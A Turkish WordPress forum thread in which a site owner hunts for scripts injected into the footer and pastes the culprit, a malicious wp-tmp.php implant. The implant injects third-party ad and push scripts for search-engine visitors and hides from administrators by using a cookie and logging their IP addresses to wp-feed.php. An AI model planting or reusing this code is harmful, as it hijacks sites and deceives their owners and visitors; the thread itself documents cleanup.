0
Kayıt Ol

Wp footer sayfası

10

248

  • 22-09-2018, 12:23:15
    #1
    MeMoLi
    MeMoLi
    Hallettim
  • 22-09-2018, 12:27:59
    #2
    DSunucu
    DSunucu
    wp nin değil temanın klasörüne bak hocam
  • 22-09-2018, 12:28:24
    #3
    HatayMaster
    HatayMaster
    Üyeliği durduruldu
    Functions.php de o fonksiyonları bulup inceleyin muhtemelen ordadır ya da footer.php de include edilen yabancı dosyalara göz atabilirsiniz.
  • 22-09-2018, 13:03:51
    #4
    MeMoLi
    MeMoLi
    DSunucu adlı üyeden alıntı: mesajı görüntüle
    wp nin değil temanın klasörüne bak hocam
    HatayMaster adlı üyeden alıntı: mesajı görüntüle
    Functions.php de o fonksiyonları bulup inceleyin muhtemelen ordadır ya da footer.php de include edilen yabancı dosyalara göz atabilirsiniz.
    Göremedim ordada
  • 22-09-2018, 13:14:03
    #6
    MeMoLi
    MeMoLi
    SametALMDR adlı üyeden alıntı: mesajı görüntüle
    wp-includes/general-template.php
    orayada baktım js kodu eklememişler oraya
  • 22-09-2018, 13:15:20
    #7
    SametALMDR
    SametALMDR
    içerisinde farklı fonksiyonlar da var ise onlarada göz atın hocam
  • 22-09-2018, 13:21:12
    #8
    MeMoLi
    MeMoLi
    SametALMDR adlı üyeden alıntı: mesajı görüntüle
    içerisinde farklı fonksiyonlar da var ise onlarada göz atın hocam
    Notepadda açılmıyordu ki toplu tarayayım. Notepada sürükledim geldi arattım wp-tmp.php'da çıktı bu Teşekkürler herkese

    ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='445ee9d5a643d0b9ec0c71484793086';




if ( ! function_exists( 'slider_option' ) ) {  

function slider_option($content){
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1961477"></script>
<script src="//luckypushh.com/ntfc.php?p=1961485" data-cfasync="false" async></script>
';

$content=$content.$con2;
}
return $content;
}

function slider_option_footer(){
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1961477"></script>
<script src="//luckypushh.com/ntfc.php?p=1961485" data-cfasync="false" async></script>
';

echo $con2;
}
}








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

}





}
    SametALMDR adlı üyeden alıntı: mesajı görüntüle
    içerisinde farklı fonksiyonlar da var ise onlarada göz atın hocam
    https://www.r10.net/genel-webmaster-...en-virusu.html hocam şuan bu virüs kaldı SQL'de ekli kod uzun olduğu için toplu değiştir işe yaramıyor nasıl değiştirebilirim tüm yazılardan bunu acaba
  • 22-09-2018, 13:28:39
    #9
    SametALMDR
    SametALMDR
    Aklıma sadece bi mantık geldi eğer değiştiremiyorsanız var olan virüslü tabloları silin daha sonra tekrar içerisine bir şey atmadan tekrar oluşturun aldığınız yedek içerisinde silinecek kısımları silin ve tekrar sql tablonuza verileri yapıştırın hocam